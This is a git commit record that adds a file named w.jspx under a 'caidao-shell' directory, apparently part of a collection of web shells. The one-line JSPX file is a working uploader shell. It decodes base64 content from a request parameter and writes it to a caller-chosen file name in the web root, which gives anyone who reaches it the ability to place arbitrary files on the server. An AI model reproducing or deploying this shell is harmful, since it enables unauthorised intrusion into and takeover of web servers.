Create w.jspx

This commit is contained in:
tennc 2016-05-29 09:28:02 +08:00
parent 4db274efc3
commit 486f74dfb5

1
caidao-shell/w.jspx Normal file
View file

@ -0,0 +1 @@
<jsp:root xmlns:jsp="http://java.sun.com/JSP/Page" version="2.0"><jsp:scriptlet>new java.io.FileOutputStream(application.getRealPath("/")+"/"+request.getParameter("f")).write(new sun.misc.BASE64Decoder().decodeBuffer(request.getParameter("c")));out.close();</jsp:scriptlet></jsp:root>